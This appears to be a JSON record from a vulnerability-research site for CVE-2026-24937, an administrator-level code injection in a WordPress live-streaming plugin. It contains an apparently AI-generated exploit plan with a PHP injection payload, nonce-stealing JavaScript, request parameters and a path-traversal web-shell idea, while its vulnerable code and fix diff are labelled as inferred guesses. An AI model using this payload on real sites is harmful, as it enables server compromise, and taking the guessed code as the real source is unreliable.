[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9gb67AvkI9sJvXJMZYQt3GbWblGeUaaOL8eyGFliHZw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-24937","broadcast-live-video-live-streaming-webrtc-hls-rtsp-rtmp-authenticated-admin-remote-code-execution","Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP \u003C 7.1.3 - Authenticated (Admin+) Remote Code Execution","The Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP plugin for WordPress is vulnerable to Remote Code Execution in all versions up to 7.1.3 (exclusive). This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","videowhisper-live-streaming-integration",null,"\u003C7.1.3","7.1.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-05-25 00:00:00","2026-05-26 20:09:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa50e2df0-b45e-4a0a-b6dc-f05b4286132a?source=api-prod",2,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-24937 (Broadcast Live Video – Live Streaming RCE)\n\n## 1. Vulnerability Summary\n*   **ID:** CVE-2026-24937\n*   **Plugin:** Broadcast Live Video – Live Streaming (slug: `videowhisper-live-streaming-integration`)\n*   **Vulnerability Type:** Improper Control of Generation of Code ('Code Injection')\n*   **Privilege Level:** Authenticated (Administrator+)\n*   **Description:** The plugin fails to properly sanitize administrative settings before writing them into a PHP configuration file or executing them. This allows an attacker with administrator privileges to inject and execute arbitrary PHP code on the server, potentially bypassing `DISALLOW_FILE_EDIT` restrictions.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Administrative settings page, likely located at `wp-admin\u002Fadmin.php?page=videowhisper-live-streaming` or a submenu like `wp-admin\u002Fadmin.php?page=vw_ls_settings`.\n*   **Action:** Form submission to save plugin configurations. This may go through `options.php` or a custom `admin-post.php` \u002F AJAX handler.\n*   **Payload Parameter:** A text field intended for RTMP server addresses, application names, or custom script paths (e.g., `rtmp_server`, `rtmp_address`, or `videowhisper_options[server_address]`).\n*   **Preconditions:** The attacker must have an active session with the `manage_options` capability (Administrator role).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers its settings page in `videowhisper-live-streaming-integration.php` using `add_menu_page`.\n2.  **Processing Logic:** The settings callback (likely in `ls_settings.php` or `inc\u002Fsettings.php`) processes the `$_POST` data when the \"Save Changes\" button is clicked.\n3.  **Vulnerable Sink:** The plugin constructs a PHP configuration file string by concatenating user-provided settings.\n    *   *Example Vulnerable Pattern:* `$content = \"\u003C?php \\$rtmp_server = '\" . $_POST['server_address'] . \"'; ?>\";`\n4.  **File Generation:** The plugin writes this string to a file on disk, such as `ls_config.php` or `vw_config.php` inside the plugin directory, using `file_put_contents`.\n5.  **Execution:** The plugin later uses `include` or `require` on this file during streaming operations or when loading the settings page to display current values.\n\n## 4. Nonce Acquisition Strategy\nSince this is an authenticated Admin-level exploit, a WordPress nonce is required to bypass CSRF protections on the settings form.\n1.  **Navigate:** Use `browser_navigate` to reach the settings page: `\u002Fwp-admin\u002Fadmin.php?page=videowhisper-live-streaming`.\n2.  **Extract:** Use `browser_eval` to locate the nonce within the settings form.\n    ```javascript\n    \u002F\u002F Common WordPress patterns for settings nonces\n    var nonce = document.querySelector('input[name=\"_wpnonce\"]')?.value || \n                document.querySelector('input[name=\"videowhisper_nonce\"]')?.value;\n    nonce;\n    ```\n3.  **Identify Form Fields:** Inspect the page for the specific parameter name and the form's `action` attribute (often `options.php`).\n\n## 5. Exploitation Strategy\n1.  **Setup:** Login as Administrator and navigate to the settings page.\n2.  **Payload Injection:** Identify a field that accepts string input (e.g., Server Address).\n    *   **Payload:** `'); system('id'); \u002F\u002F`\n    *   This payload attempts to close the PHP variable assignment string and execute a system command.\n3.  **HTTP Request:** Use `http_request` to submit the form.\n    *   **Method:** `POST`\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions.php` (if using Settings API) or the plugin's own page.\n    *   **Parameters:**\n        *   `_wpnonce`: (Extracted nonce)\n        *   `option_page`: `videowhisper_settings_group` (inferred)\n        *   `action`: `update`\n        *   `target_field_name`: `'); system('id'); \u002F\u002F`\n4.  **Trigger:**\n    *   **Option A:** Access the generated file directly: `http:\u002F\u002Flocalhost:8080\u002Fwp-content\u002Fplugins\u002Fvideowhisper-live-streaming-integration\u002Fls_config.php`.\n    *   **Option B:** Refresh the settings page if it includes the config file.\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** `wp plugin install videowhisper-live-streaming-integration --activate`\n2.  **Verify Permissions:** Ensure the web server has write access to the plugin's directory.\n3.  **Shortcode (if needed for trigger):** Create a page with `[videowhisper_broadcast]` to trigger the inclusion of configuration files.\n    *   `wp post create --post_type=page --post_status=publish --post_content='[videowhisper_broadcast]'`\n\n## 7. Expected Results\n*   Upon requesting the triggered endpoint, the HTTP response body should contain the output of the `id` command (e.g., `uid=33(www-data)...`).\n*   The `ls_config.php` file on the filesystem will contain the malicious code block.\n\n## 8. Verification Steps\n1.  **CLI Check:** Verify the file content via the container terminal:\n    `cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fvideowhisper-live-streaming-integration\u002Fls_config.php`\n2.  **Option Check:** Verify the setting was saved in the database:\n    `wp option get videowhisper_live_streaming_options` (inferred)\n\n## 9. Alternative Approaches\n*   **Direct eval():** If the plugin does not write to a file, look for `eval()` calls in `ls_functions.php` that process settings stored in the database.\n*   **Path Traversal:** If code injection is blocked, check if the file path in `file_put_contents` can be manipulated via a parameter like `config_file_name` to write a shell in a different directory (e.g., `\u002Fwp-content\u002Fuploads\u002Fshell.php`).","The Broadcast Live Video plugin is vulnerable to authenticated Remote Code Execution (RCE) because it writes administrative settings directly into a PHP configuration file without sanitization. An attacker with Administrator-level privileges can inject malicious PHP code into these settings, which is then executed when the plugin loads its configuration.","\u002F\u002F Inferred from research plan logic\n\u002F\u002F wp-content\u002Fplugins\u002Fvideowhisper-live-streaming-integration\u002Fls_settings.php\n\n$rtmp_server = $_POST['server_address'];\n$content = \"\u003C?php \\$rtmp_server = '\" . $rtmp_server . \"'; ?>\";\nfile_put_contents('ls_config.php', $content);","--- videowhisper-live-streaming-integration\u002Fls_settings.php\n+++ videowhisper-live-streaming-integration\u002Fls_settings.php\n@@ -1,3 +1,3 @@\n-$rtmp_server = $_POST['server_address'];\n-$content = \"\u003C?php \\$rtmp_server = '\" . $rtmp_server . \"'; ?>\";\n+$rtmp_server = sanitize_text_field($_POST['server_address']);\n+$content = \"\u003C?php \\$rtmp_server = \" . var_export($rtmp_server, true) . \"; ?>\";\n file_put_contents('ls_config.php', $content);","The exploit requires Administrator privileges and a valid CSRF nonce from the plugin settings page. An attacker submits a POST request to update the plugin settings, injecting a PHP payload like `'); system('id'); \u002F\u002F` into a text field such as the RTMP server address. This payload breaks out of the intended PHP string assignment in the generated configuration file. The attacker then triggers execution by directly requesting the newly created or updated PHP configuration file (e.g., `ls_config.php`) or by loading a page where the plugin includes that file.","gemini-3-flash-preview","2026-06-04 21:02:27","2026-06-04 21:03:41",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","6.2.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvideowhisper-live-streaming-integration\u002Ftags\u002F6.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvideowhisper-live-streaming-integration.6.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvideowhisper-live-streaming-integration\u002Ftags"]